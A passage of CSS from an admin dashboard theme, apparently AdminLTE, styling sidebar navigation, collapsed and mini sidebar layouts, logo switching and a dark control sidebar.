.sidebar-light-gray-dark .nav-sidebar > .nav-item > .nav-link.active {
background-color: #343a40;
color: #ffffff;
}
.sidebar-dark-gray-dark .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-gray-dark .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #343a40;
}
.sidebar-mini .main-sidebar:not(.sidebar-no-expand) .nav-compact.nav-sidebar.nav-child-indent:not(.nav-flat) .nav-treeview,
.sidebar-mini-md .main-sidebar:not(.sidebar-no-expand) .nav-compact.nav-sidebar.nav-child-indent:not(.nav-flat) .nav-treeview,
.sidebar-mini .main-sidebar:not(.sidebar-no-expand):hover .nav-compact.nav-sidebar.nav-child-indent:not(.nav-flat) .nav-treeview,
.sidebar-mini-md .main-sidebar:not(.sidebar-no-expand):hover .nav-compact.nav-sidebar.nav-child-indent:not(.nav-flat) .nav-treeview,
.sidebar-mini .main-sidebar.sidebar-focused .nav-compact.nav-sidebar.nav-child-indent:not(.nav-flat) .nav-treeview,
.sidebar-mini-md .main-sidebar.sidebar-focused .nav-compact.nav-sidebar.nav-child-indent:not(.nav-flat) .nav-treeview {
padding-left: 1rem;
margin-left: -.5rem;
}
.nav-flat {
margin: -0.25rem -0.5rem 0;
}
.nav-flat .nav-item > .nav-link {
border-radius: 0;
margin-bottom: 0;
}
.nav-flat .nav-item > .nav-link > .nav-icon {
margin-left: .55rem;
}
.nav-flat:not(.nav-child-indent) .nav-treeview .nav-item > .nav-link > .nav-icon {
margin-left: .4rem;
}
.nav-flat.nav-child-indent .nav-treeview {
padding-left: 0;
}
.nav-flat.nav-child-indent .nav-treeview .nav-icon {
margin-left: .85rem;
}
.nav-flat.nav-child-indent .nav-treeview .nav-treeview {
border-left: .2rem solid;
}
.nav-flat.nav-child-indent .nav-treeview .nav-treeview .nav-icon {
margin-left: 1.15rem;
}
.nav-flat.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-icon {
margin-left: 1.45rem;
}
.nav-flat.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon {
margin-left: 1.75rem;
}
.nav-flat.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon {
margin-left: 2.05rem;
}
.sidebar-collapse .nav-flat.nav-child-indent .nav-treeview .nav-icon {
margin-left: .55rem;
}
.sidebar-collapse .nav-flat.nav-child-indent .nav-treeview .nav-link {
padding-left: calc(1rem - .2rem);
}
.sidebar-collapse .nav-flat.nav-child-indent .nav-treeview .nav-treeview .nav-icon {
margin-left: .35rem;
}
.sidebar-collapse .nav-flat.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-icon {
margin-left: .15rem;
}
.sidebar-collapse .nav-flat.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon {
margin-left: -.15rem;
}
.sidebar-collapse .nav-flat.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon {
margin-left: -.35rem;
}
.sidebar-mini .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-compact.nav-sidebar .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-compact.nav-sidebar .nav-treeview .nav-icon ,
.sidebar-mini .main-sidebar.sidebar-focused .nav-flat.nav-compact.nav-sidebar .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar.sidebar-focused .nav-flat.nav-compact.nav-sidebar .nav-treeview .nav-icon {
margin-left: .4rem;
}
.sidebar-mini .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-icon ,
.sidebar-mini .main-sidebar.sidebar-focused .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar.sidebar-focused .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-icon {
margin-left: .85rem;
}
.sidebar-mini .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini .main-sidebar.sidebar-focused .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar.sidebar-focused .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-icon {
margin-left: 1.15rem;
}
.sidebar-mini .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini .main-sidebar.sidebar-focused .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar.sidebar-focused .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-icon {
margin-left: 1.45rem;
}
.sidebar-mini .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini .main-sidebar.sidebar-focused .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar.sidebar-focused .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon {
margin-left: 1.75rem;
}
.sidebar-mini .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar:not(.sidebar-no-expand):hover .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini .main-sidebar.sidebar-focused .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon ,
.sidebar-mini-md .main-sidebar.sidebar-focused .nav-flat.nav-sidebar.nav-child-indent .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-treeview .nav-icon {
margin-left: 2.05rem;
}
.nav-flat .nav-icon {
transition: margin-left ease-in-out 0.3s;
}
@media (prefers-reduced-motion: reduce) {
.nav-flat .nav-icon {
transition: none;
}
}
.nav-flat .nav-treeview .nav-icon {
margin-left: -.2rem;
}
.nav-flat.nav-sidebar > .nav-item .nav-treeview,
.nav-flat.nav-sidebar > .nav-item > .nav-treeview {
background: rgba(255, 255, 255, 0.05);
}
.nav-flat.nav-sidebar > .nav-item .nav-treeview .nav-item > .nav-link,
.nav-flat.nav-sidebar > .nav-item > .nav-treeview .nav-item > .nav-link {
border-left: .2rem solid;
}
.nav-legacy {
margin: -0.25rem -0.5rem 0;
}
.nav-legacy.nav-sidebar .nav-item > .nav-link {
border-radius: 0;
margin-bottom: 0;
}
.nav-legacy.nav-sidebar .nav-item > .nav-link > .nav-icon {
margin-left: .55rem;
}
.text-sm .nav-legacy.nav-sidebar .nav-item > .nav-link > .nav-icon {
margin-left: .75rem;
}
.nav-legacy.nav-sidebar > .nav-item > .nav-link.active {
background: inherit;
border-left: 3px solid transparent;
box-shadow: none;
}
.nav-legacy.nav-sidebar > .nav-item > .nav-link.active > .nav-icon {
margin-left: calc(.55rem - 3px);
}
.text-sm .nav-legacy.nav-sidebar > .nav-item > .nav-link.active > .nav-icon {
margin-left: calc(.75rem - 3px);
}
.text-sm .nav-legacy.nav-sidebar.nav-flat .nav-treeview .nav-item > .nav-link > .nav-icon {
margin-left: calc(.75rem - 3px);
}
.sidebar-mini .nav-legacy > .nav-item .nav-link .nav-icon,
.sidebar-mini-md .nav-legacy > .nav-item .nav-link .nav-icon {
transition: margin-left ease-in-out 0.3s;
margin-left: .75rem;
}
@media (prefers-reduced-motion: reduce) {
.sidebar-mini .nav-legacy > .nav-item .nav-link .nav-icon,
.sidebar-mini-md .nav-legacy > .nav-item .nav-link .nav-icon {
transition: none;
}
}
.sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .nav-legacy.nav-child-indent .nav-treeview,
.sidebar-mini.sidebar-collapse .main-sidebar:hover .nav-legacy.nav-child-indent .nav-treeview,
.sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .nav-legacy.nav-child-indent .nav-treeview,
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .nav-legacy.nav-child-indent .nav-treeview {
padding-left: 1rem;
}
.sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .nav-legacy.nav-child-indent .nav-treeview .nav-treeview,
.sidebar-mini.sidebar-collapse .main-sidebar:hover .nav-legacy.nav-child-indent .nav-treeview .nav-treeview,
.sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .nav-legacy.nav-child-indent .nav-treeview .nav-treeview,
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .nav-legacy.nav-child-indent .nav-treeview .nav-treeview {
padding-left: 2rem;
margin-left: -1rem;
}
.sidebar-mini.sidebar-collapse.text-sm .main-sidebar.sidebar-focused .nav-legacy.nav-child-indent .nav-treeview,
.sidebar-mini.sidebar-collapse.text-sm .main-sidebar:hover .nav-legacy.nav-child-indent .nav-treeview,
.sidebar-mini-md.sidebar-collapse.text-sm .main-sidebar.sidebar-focused .nav-legacy.nav-child-indent .nav-treeview,
.sidebar-mini-md.sidebar-collapse.text-sm .main-sidebar:hover .nav-legacy.nav-child-indent .nav-treeview {
padding-left: .5rem;
}
.sidebar-mini.sidebar-collapse.text-sm .main-sidebar.sidebar-focused .nav-legacy.nav-child-indent .nav-treeview .nav-treeview,
.sidebar-mini.sidebar-collapse.text-sm .main-sidebar:hover .nav-legacy.nav-child-indent .nav-treeview .nav-treeview,
.sidebar-mini-md.sidebar-collapse.text-sm .main-sidebar.sidebar-focused .nav-legacy.nav-child-indent .nav-treeview .nav-treeview,
.sidebar-mini-md.sidebar-collapse.text-sm .main-sidebar:hover .nav-legacy.nav-child-indent .nav-treeview .nav-treeview {
padding-left: 1rem;
margin-left: -.5rem;
}
.sidebar-mini.sidebar-collapse .nav-legacy > .nav-item > .nav-link .nav-icon,
.sidebar-mini-md.sidebar-collapse .nav-legacy > .nav-item > .nav-link .nav-icon {
margin-left: .55rem;
}
.sidebar-mini.sidebar-collapse .nav-legacy > .nav-item > .nav-link.active > .nav-icon,
.sidebar-mini-md.sidebar-collapse .nav-legacy > .nav-item > .nav-link.active > .nav-icon {
margin-left: .36rem;
}
.sidebar-mini.sidebar-collapse .nav-legacy.nav-child-indent .nav-treeview .nav-treeview,
.sidebar-mini-md.sidebar-collapse .nav-legacy.nav-child-indent .nav-treeview .nav-treeview {
padding-left: 0;
margin-left: 0;
}
.sidebar-mini.sidebar-collapse.text-sm .nav-legacy > .nav-item > .nav-link .nav-icon,
.sidebar-mini-md.sidebar-collapse.text-sm .nav-legacy > .nav-item > .nav-link .nav-icon {
margin-left: .75rem;
}
.sidebar-mini.sidebar-collapse.text-sm .nav-legacy > .nav-item > .nav-link.active > .nav-icon,
.sidebar-mini-md.sidebar-collapse.text-sm .nav-legacy > .nav-item > .nav-link.active > .nav-icon {
margin-left: calc(.75rem - 3px);
}
[class*='sidebar-dark'] .nav-legacy.nav-sidebar > .nav-item .nav-treeview,
[class*='sidebar-dark'] .nav-legacy.nav-sidebar > .nav-item > .nav-treeview {
background: rgba(255, 255, 255, 0.05);
}
[class*='sidebar-dark'] .nav-legacy.nav-sidebar > .nav-item > .nav-link.active {
color: #ffffff;
}
[class*='sidebar-dark'] .nav-legacy .nav-treeview > .nav-item > .nav-link.active, [class*='sidebar-dark'] .nav-legacy .nav-treeview > .nav-item > .nav-link:focus, [class*='sidebar-dark'] .nav-legacy .nav-treeview > .nav-item > .nav-link:hover {
background: none;
color: #ffffff;
}
[class*='sidebar-light'] .nav-legacy.nav-sidebar > .nav-item .nav-treeview,
[class*='sidebar-light'] .nav-legacy.nav-sidebar > .nav-item > .nav-treeview {
background: rgba(0, 0, 0, 0.05);
}
[class*='sidebar-light'] .nav-legacy.nav-sidebar > .nav-item > .nav-link.active {
color: #000;
}
[class*='sidebar-light'] .nav-legacy .nav-treeview > .nav-item > .nav-link.active, [class*='sidebar-light'] .nav-legacy .nav-treeview > .nav-item > .nav-link:focus, [class*='sidebar-light'] .nav-legacy .nav-treeview > .nav-item > .nav-link:hover {
background: none;
color: #000;
}
.nav-collapse-hide-child .menu-open > .nav-treeview {
max-height: -webkit-min-content;
max-height: -moz-min-content;
max-height: min-content;
opacity: 1;
}
.sidebar-collapse .nav-collapse-hide-child .menu-open > .nav-treeview {
max-height: 0;
opacity: 0;
}
.sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .nav-collapse-hide-child .menu-open > .nav-treeview,
.sidebar-mini.sidebar-collapse .main-sidebar:hover .nav-collapse-hide-child .menu-open > .nav-treeview,
.sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .nav-collapse-hide-child .menu-open > .nav-treeview,
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .nav-collapse-hide-child .menu-open > .nav-treeview {
max-height: -webkit-min-content;
max-height: -moz-min-content;
max-height: min-content;
opacity: 1;
}
.nav-compact .nav-link,
.nav-compact .nav-header {
padding-top: 0.25rem;
padding-bottom: 0.25rem;
}
.nav-compact .nav-header:not(:first-of-type) {
padding-top: 0.75rem;
padding-bottom: 0.25rem;
}
.nav-compact .nav-link > .right,
.nav-compact .nav-link > p > .right {
top: .465rem;
}
.text-sm .nav-compact .nav-link > .right,
.text-sm .nav-compact .nav-link > p > .right {
top: .7rem;
}
[class*='sidebar-dark'] .form-control-sidebar,
[class*='sidebar-dark'] .btn-sidebar {
background: #3f474e;
border: 1px solid #56606a;
color: white;
}
[class*='sidebar-dark'] .form-control-sidebar:focus,
[class*='sidebar-dark'] .btn-sidebar:focus {
border: 1px solid #7a8793;
}
[class*='sidebar-dark'] .btn-sidebar:hover {
background: #454d55;
}
[class*='sidebar-dark'] .btn-sidebar:focus {
background: #4b545c;
}
[class*='sidebar-light'] .form-control-sidebar,
[class*='sidebar-light'] .btn-sidebar {
background: #f2f2f2;
border: 1px solid #d9d9d9;
color: #1F2D3D;
}
[class*='sidebar-light'] .form-control-sidebar:focus,
[class*='sidebar-light'] .btn-sidebar:focus {
border: 1px solid #b3b3b3;
}
[class*='sidebar-light'] .btn-sidebar:hover {
background: #ececec;
}
[class*='sidebar-light'] .btn-sidebar:focus {
background: #e6e6e6;
}
.logo-xs,
.logo-xl {
opacity: 1;
position: absolute;
visibility: visible;
}
.logo-xs.brand-image-xs,
.logo-xl.brand-image-xs {
left: 18px;
top: 12px;
}
.logo-xs.brand-image-xl,
.logo-xl.brand-image-xl {
left: 12px;
top: 6px;
}
.logo-xs {
opacity: 0;
visibility: hidden;
}
.logo-xs.brand-image-xl {
left: 16px;
top: 8px;
}
.brand-link.logo-switch::before {
content: '\00a0';
}
@media (min-width: 992px) {
.sidebar-mini .nav-sidebar,
.sidebar-mini .nav-sidebar > .nav-header,
.sidebar-mini .nav-sidebar .nav-link {
white-space: nowrap;
overflow: hidden;
}
.sidebar-mini.sidebar-collapse .d-hidden-mini {
display: none;
}
.sidebar-mini.sidebar-collapse .content-wrapper,
.sidebar-mini.sidebar-collapse .main-footer,
.sidebar-mini.sidebar-collapse .main-header {
margin-left: 4.6rem !important;
}
.sidebar-mini.sidebar-collapse .nav-sidebar .nav-header {
display: none;
}
.sidebar-mini.sidebar-collapse .nav-sidebar .nav-link p {
width: 0;
}
.sidebar-mini.sidebar-collapse .sidebar .user-panel > .info,
.sidebar-mini.sidebar-collapse .nav-sidebar .nav-link p,
.sidebar-mini.sidebar-collapse .brand-text {
margin-left: -10px;
opacity: 0;
visibility: hidden;
}
.sidebar-mini.sidebar-collapse .logo-xl {
opacity: 0;
visibility: hidden;
}
.sidebar-mini.sidebar-collapse .logo-xs {
display: inline-block;
opacity: 1;
visibility: visible;
}
.sidebar-mini.sidebar-collapse .main-sidebar {
overflow-x: hidden;
}
.sidebar-mini.sidebar-collapse .main-sidebar, .sidebar-mini.sidebar-collapse .main-sidebar::before {
margin-left: 0;
width: 4.6rem;
}
.sidebar-mini.sidebar-collapse .main-sidebar .user-panel .image {
float: none;
}
.sidebar-mini.sidebar-collapse .main-sidebar:hover, .sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused {
width: 250px;
}
.sidebar-mini.sidebar-collapse .main-sidebar:hover .brand-link, .sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .brand-link {
width: 250px;
}
.sidebar-mini.sidebar-collapse .main-sidebar:hover .user-panel, .sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .user-panel {
text-align: left;
}
.sidebar-mini.sidebar-collapse .main-sidebar:hover .user-panel .image, .sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .user-panel .image {
float: left;
}
.sidebar-mini.sidebar-collapse .main-sidebar:hover .user-panel > .info,
.sidebar-mini.sidebar-collapse .main-sidebar:hover .nav-sidebar .nav-link p,
.sidebar-mini.sidebar-collapse .main-sidebar:hover .brand-text,
.sidebar-mini.sidebar-collapse .main-sidebar:hover .logo-xl, .sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .user-panel > .info,
.sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .nav-sidebar .nav-link p,
.sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .brand-text,
.sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .logo-xl {
display: inline-block;
margin-left: 0;
opacity: 1;
visibility: visible;
}
.sidebar-mini.sidebar-collapse .main-sidebar:hover .logo-xs, .sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .logo-xs {
opacity: 0;
visibility: hidden;
}
.sidebar-mini.sidebar-collapse .main-sidebar:hover .brand-image, .sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .brand-image {
margin-right: .5rem;
}
.sidebar-mini.sidebar-collapse .main-sidebar:hover .sidebar-form,
.sidebar-mini.sidebar-collapse .main-sidebar:hover .user-panel > .info, .sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .sidebar-form,
.sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .user-panel > .info {
display: block !important;
-webkit-transform: translateZ(0);
}
.sidebar-mini.sidebar-collapse .main-sidebar:hover .nav-sidebar > .nav-item > .nav-link > span, .sidebar-mini.sidebar-collapse .main-sidebar.sidebar-focused .nav-sidebar > .nav-item > .nav-link > span {
display: inline-block !important;
}
.sidebar-mini.sidebar-collapse .visible-sidebar-mini {
display: block !important;
}
.sidebar-mini.sidebar-collapse.layout-fixed .main-sidebar:hover .brand-link {
width: 250px;
}
.sidebar-mini.sidebar-collapse.layout-fixed .brand-link {
width: 4.6rem;
}
}
@media (max-width: 991.98px) {
.sidebar-mini.sidebar-collapse .main-sidebar {
box-shadow: none !important;
}
}
@media (min-width: 768px) {
.sidebar-mini-md .nav-sidebar,
.sidebar-mini-md .nav-sidebar > .nav-header,
.sidebar-mini-md .nav-sidebar .nav-link {
white-space: nowrap;
overflow: hidden;
}
.sidebar-mini-md.sidebar-collapse .d-hidden-mini {
display: none;
}
.sidebar-mini-md.sidebar-collapse .content-wrapper,
.sidebar-mini-md.sidebar-collapse .main-footer,
.sidebar-mini-md.sidebar-collapse .main-header {
margin-left: 4.6rem !important;
}
.sidebar-mini-md.sidebar-collapse .nav-sidebar .nav-header {
display: none;
}
.sidebar-mini-md.sidebar-collapse .nav-sidebar .nav-link p {
width: 0;
}
.sidebar-mini-md.sidebar-collapse .sidebar .user-panel > .info,
.sidebar-mini-md.sidebar-collapse .nav-sidebar .nav-link p,
.sidebar-mini-md.sidebar-collapse .brand-text {
margin-left: -10px;
opacity: 0;
visibility: hidden;
}
.sidebar-mini-md.sidebar-collapse .logo-xl {
opacity: 0;
visibility: hidden;
}
.sidebar-mini-md.sidebar-collapse .logo-xs {
display: inline-block;
opacity: 1;
visibility: visible;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar {
overflow-x: hidden;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar, .sidebar-mini-md.sidebar-collapse .main-sidebar::before {
margin-left: 0;
width: 4.6rem;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar .user-panel .image {
float: none;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover, .sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused {
width: 250px;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .brand-link, .sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .brand-link {
width: 250px;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .user-panel, .sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .user-panel {
text-align: left;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .user-panel .image, .sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .user-panel .image {
float: left;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .user-panel > .info,
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .nav-sidebar .nav-link p,
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .brand-text,
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .logo-xl, .sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .user-panel > .info,
.sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .nav-sidebar .nav-link p,
.sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .brand-text,
.sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .logo-xl {
display: inline-block;
margin-left: 0;
opacity: 1;
visibility: visible;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .logo-xs, .sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .logo-xs {
opacity: 0;
visibility: hidden;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .brand-image, .sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .brand-image {
margin-right: .5rem;
}
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .sidebar-form,
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .user-panel > .info, .sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .sidebar-form,
.sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .user-panel > .info {
display: block !important;
-webkit-transform: translateZ(0);
}
.sidebar-mini-md.sidebar-collapse .main-sidebar:hover .nav-sidebar > .nav-item > .nav-link > span, .sidebar-mini-md.sidebar-collapse .main-sidebar.sidebar-focused .nav-sidebar > .nav-item > .nav-link > span {
display: inline-block !important;
}
.sidebar-mini-md.sidebar-collapse .visible-sidebar-mini {
display: block !important;
}
.sidebar-mini-md.sidebar-collapse.layout-fixed .main-sidebar:hover .brand-link {
width: 250px;
}
.sidebar-mini-md.sidebar-collapse.layout-fixed .brand-link {
width: 4.6rem;
}
}
@media (max-width: 767.98px) {
.sidebar-mini-md.sidebar-collapse .main-sidebar {
box-shadow: none !important;
}
}
.sidebar-collapse .main-sidebar.sidebar-focused .nav-header,
.sidebar-collapse .main-sidebar:hover .nav-header {
display: inline-block;
}
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover {
width: 4.6rem;
}
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused .nav-header,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover .nav-header {
display: none;
}
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused .brand-link,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover .brand-link {
width: 4.6rem !important;
}
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused .user-panel .image,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover .user-panel .image {
float: none !important;
}
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused .logo-xs,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover .logo-xs {
opacity: 1;
visibility: visible;
}
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused .logo-xl,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover .logo-xl {
opacity: 0;
visibility: hidden;
}
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused .nav-sidebar.nav-child-indent .nav-treeview,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover .nav-sidebar.nav-child-indent .nav-treeview {
padding-left: 0;
}
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused .brand-text,
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused .user-panel > .info,
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused .nav-sidebar .nav-link p,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover .brand-text,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover .user-panel > .info,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover .nav-sidebar .nav-link p {
margin-left: -10px;
opacity: 0;
visibility: hidden;
width: 0;
}
.sidebar-collapse .sidebar-no-expand.main-sidebar.sidebar-focused .nav-sidebar > .nav-item .nav-icon,
.sidebar-collapse .sidebar-no-expand.main-sidebar:hover .nav-sidebar > .nav-item .nav-icon {
margin-right: 0;
}
.nav-sidebar {
position: relative;
}
.nav-sidebar:hover {
overflow: visible;
}
.sidebar-form,
.nav-sidebar > .nav-header {
overflow: hidden;
text-overflow: clip;
}
.nav-sidebar .nav-item > .nav-link {
position: relative;
}
.nav-sidebar .nav-item > .nav-link > .float-right {
margin-top: -7px;
position: absolute;
right: 10px;
top: 50%;
}
.sidebar .nav-link p,
.main-sidebar .brand-text,
.main-sidebar .logo-xs,
.main-sidebar .logo-xl,
.sidebar .user-panel .info {
transition: margin-left 0.3s linear, opacity 0.3s ease, visibility 0.3s ease;
}
@media (prefers-reduced-motion: reduce) {
.sidebar .nav-link p,
.main-sidebar .brand-text,
.main-sidebar .logo-xs,
.main-sidebar .logo-xl,
.sidebar .user-panel .info {
transition: none;
}
}
html.control-sidebar-animate {
overflow-x: hidden;
}
.control-sidebar {
bottom: calc(3.5rem + 1px);
position: absolute;
top: calc(3.5rem + 1px);
z-index: 1031;
}
.control-sidebar, .control-sidebar::before {
bottom: calc(3.5rem + 1px);
display: none;
right: -250px;
width: 250px;
transition: right 0.3s ease-in-out, display 0.3s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
.control-sidebar, .control-sidebar::before {
transition: none;
}
}
.control-sidebar::before {
content: '';
display: block;
position: fixed;
top: 0;
z-index: -1;
}
body.text-sm .control-sidebar {
bottom: calc(2.9365rem + 1px);
top: calc(2.93725rem + 1px);
}
.main-header.text-sm ~ .control-sidebar {
top: calc(2.93725rem + 1px);
}
.main-footer.text-sm ~ .control-sidebar {
bottom: calc(2.9365rem + 1px);
}
.control-sidebar-push-slide .content-wrapper,
.control-sidebar-push-slide .main-footer {
transition: margin-right 0.3s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
.control-sidebar-push-slide .content-wrapper,
.control-sidebar-push-slide .main-footer {
transition: none;
}
}
.control-sidebar-open .control-sidebar {
display: block;
}
.control-sidebar-open .control-sidebar, .control-sidebar-open .control-sidebar::before {
right: 0;
}
.control-sidebar-open.control-sidebar-push .content-wrapper,
.control-sidebar-open.control-sidebar-push .main-footer, .control-sidebar-open.control-sidebar-push-slide .content-wrapper,
.control-sidebar-open.control-sidebar-push-slide .main-footer {
margin-right: 250px;
}
.control-sidebar-slide-open .control-sidebar {
display: block;
}
.control-sidebar-slide-open .control-sidebar, .control-sidebar-slide-open .control-sidebar::before {
right: 0;
transition: right 0.3s ease-in-out, display 0.3s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
.control-sidebar-slide-open .control-sidebar, .control-sidebar-slide-open .control-sidebar::before {
transition: none;
}
}
.control-sidebar-slide-open.control-sidebar-push .content-wrapper,
.control-sidebar-slide-open.control-sidebar-push .main-footer, .control-sidebar-slide-open.control-sidebar-push-slide .content-wrapper,
.control-sidebar-slide-open.control-sidebar-push-slide .main-footer {
margin-right: 250px;
}
.control-sidebar-dark,
.control-sidebar-dark a,
.control-sidebar-dark .nav-link {
color: #C2C7D0;
}
.control-sidebar-dark {
background: #343a40;
}
.control-sidebar-dark a:hover {
color: #ffffff;
}
.control-sidebar-dark h1,
.control-sidebar-dark h2,
.control-sidebar-dark h3,
.control-sidebar-dark h4,
.control-sidebar-dark h5,
.control-sidebar-dark h6,
.control-sidebar-dark label {
color: #ffffff;
}
.control-sidebar-dark .nav-tabs {
background-color: rgba(255, 255, 255, 0.1);
border-bottom: 0;
margin-bottom: 5px;
}
.control-sidebar-dark .nav-tabs .nav-item {
margin: 0;
}
.control-sidebar-dark .nav-tabs .nav-link {
border-radius: 0;
padding: 10px 20px;
position: relative;
text-align: center;
}
